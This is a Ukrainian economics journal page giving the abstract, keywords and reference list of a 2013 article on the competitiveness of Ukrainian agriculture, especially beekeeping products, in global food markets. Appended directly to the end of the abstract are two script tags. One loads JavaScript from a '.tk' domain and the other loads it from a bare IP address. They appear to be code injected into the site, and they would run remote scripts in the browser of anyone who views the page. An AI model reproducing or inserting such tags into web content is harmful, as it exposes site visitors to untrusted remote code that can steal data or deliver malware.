ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.1
Економіка агропромислового виробництва

Конкурентоспроможність галузей сільського господарства в умовах глобалізації ринку продовольства / Яценко О. М. // Економіка АПК. - 2013. - № 1 - С. 31

Емпірично підтверджено, що Україна інтегрована у глобальний світовий ринок і вже на нинішньому етапі її пропозиція щодо глобальних агропродовольчих продуктів становить вісім товарних позицій. Доведено, що одним із глобальних продуктів, попит на який на світових ринках задоволений не повною мірою, є продукція бджільництва. Із позицій холістичної парадигми та у контексті концепції багатофункціонального ринку сільського господарства доведено наявність оптимального набору конкурентних переваг, властивих продукції бджільництва, на основі чого запропоновано категорію „поліфункціо- нальна конкурентоспроможність” і математично її обгрунтовано. Табл.: 1. Рис.: 1. Бібліогр.: 18.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: інтеграція, світові ринки, конкурентоспроможність, глобалізація ринку продовольства, продукція бджільництва

Список використаних джерел

 1. АдамикВ. Оцінка конкурентоспроможності підприємства / В. Адамик, Г. Вербицька // Вісн. Тернопільського нац. екон. ун-ту. - 2008. - № 1. - С. 69-78;
 2. Базилюк Я.Б. Конкурентоспроможність національної економіки: сутність та умови забезпечення: монографія / Я.Б. Базилюк. - К.: НІСД, 2002. - 132 с.;
 3. Гайнаное Д.А. Экономико-математическая модель оценки конкурентоспособности предприятия / Д. А. Гайнанов, Г. Р. Гузаирова // Экономика и управление народным хозяйством. Весник УГТУ: Уфа - Т. 14. - 2010. - № 5 (40). - С. 243-246.
 4. Грозний І. Діагностика конкурентних переваг промислового підприємства / І. Грозний // Схід. - 2007. - № 2 (80). - С. 57-63.
 5. Жовновач Р.І. Системний підхід до управління конкурентоспроможністю підприємства / Р.І. Жовновач [Електронний ресурс]. - Режим доступу: http://www.nbuv.gov.ua/PORTAL/natural/ Npkntu_e/2010_18_1/stat_18_1/50.pdf.
 6. Жуковський М.О. Оцінка конкурентоспроможності підприємств аграрного сектора економіки / М.О. Жуковський // Актуальні проблеми економіки. - 2007. - № 9 (75). - С. 46-53.
 7. Закревська Л.М. Оцінка конкурентоспроможності підприємств кондитерської промисловості / Л.М. Закревська // Економіка: проблеми теорії та практики: зб. наук. пр. / ДНУ. - 2004. - Вип. 195, Т. 2. - С. 503-514.
 8. Кіріченко Н.С. Методологічні підходи до оцінки конкурентоспроможності сільськогосподарських підприємств. [Електронний ресурс]. / Н.С. Кіріченко - Режим доступу: http://www.nbuv.gov.Ua/portal/chem_biol/nvlnau/Ekon/2009_5/articles/N.S._Kirichenko.pdf;
 9. Конкурентоспособность предприятия: оценка, диагностика, стратегия / Ю.Б. Иванов, А.Н. Тищенко, Н.А. Дробитько, О.С. Абрамова. - Харьков: Изд-во ХНЭУ, 2004. - 256 с.;
 10. Маршалл А. Принципы экономической науки / А. Маршалл. - К.: Прогресс, 1993. - 234 с.
 11. Нужна О.А. Економічні механізми забезпечення конкурентоспроможності аграрних підприємств: дис. ... канд. екон. наук: 08.07.02 / О.А. Нужна; Луцький держ. технічний ун-т. - Луцьк, 2005. - 226 с.;
 12. Статистичні дані FAOSTAT [Електронний ресурс]. - Режим доступу: http://faostat.fao.org/site/339/default.aspx.
 13. Стратегическое управление организационно-экономической устойчивостью фирмы: Логистико-ориентированное проектирование бизнеса / А. Д. Канчавели [и др.]; под. ред. Колобова, И. Н. Омельченко. - М.: МГТУ им. Н. Э. Баумана, 2001. - 600 с.
 14. Тарнавська Н.П. Управління конкурентоспроможністю підприємств: теорія, методологія, практика / Н.П. Тарнавська. - Тернопіль: Економічна думка, 2008. - 570 с.
 15. Царенко О.В. Методи оцінки конкурентних переваг галузі промислових регіонів України / О.В. Царенко // Економічний простір. - 2009. - № 23/1. - С. 195-207.
 16. Черненко С.О. Конкуренція та ефективність товарних ринків в Україні: монографія / С.О. Черненко. - К., 2006. - 172 с.
 17. Швиданенко О.А. Передумови забезпечення конкурентоспроможності країни в контексті прогресивних глобалізаційних тенденцій / О.А. Швиданенко // Формування ринкових відносин в Україні: зб. наук. пр., вип. 3 (70). - К.: НДЕІ, 2007. - С. 43-51.
 18. Yatsenko O. Methodological instruments of polyfunctional competitiveness evaluation (on the example of agriculture) / Olga Yatsenko // USA: The Advanced Science. - 2011. - November. - C. 30-35.
Читати статтю: 13_01_04.pdf